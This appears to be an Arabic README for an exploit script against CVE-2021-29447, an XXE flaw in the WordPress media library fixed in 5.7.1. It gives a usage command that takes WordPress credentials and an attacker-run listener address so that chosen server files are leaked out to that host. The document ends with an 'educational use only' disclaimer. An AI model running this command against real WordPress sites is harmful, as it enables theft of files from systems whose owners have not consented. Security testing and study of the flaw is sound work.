
استغلال ثغرة حقن الكيانات الخارجية في XML (XXE) في مكتبة وسائط ووردبريس لتسريب الملفات.
استغلال ثغرة حقن الكيانات الخارجية (XXE) في مكتبة وسائط WordPress بسجل دخول موثّق لسرقة الملفات.
تم إصلاح الثغرة في WordPress 5.7.1.
يتطلب بيانات اعتماد ووردبريس صالحة للتفاعل مع مكتبة الوسائط.
python3 wordpress-cve-2021-29447.py -l http://LOCAL_IP:PORT -r http://WORDPRESS_URL -u USERNAME -p PASSWORD
سيطلب السكربت مسار الملف ويعيد الملف المطلوب.
مستوحى من سكربت David Utón (M3n0sD0n4ld) ExploitDB.
استخدام هذا البرنامج لمهاجمة أهداف دون موافقة مسبقة متبادلة غير قانوني. تقع على عاتق المستخدم النهائي مسؤولية الالتزام بجميع القوانين المحلية والولائية والاتحادية المعمول بها. لا يتحمل المطورون أي مسؤولية ولا يسألون عن أي إساءة استخدام أو ضرر يسببه هذا البرنامج. استخدمه لأغراض تعليمية فقط.
صدر هذا السكربت بموجب رخصة MIT.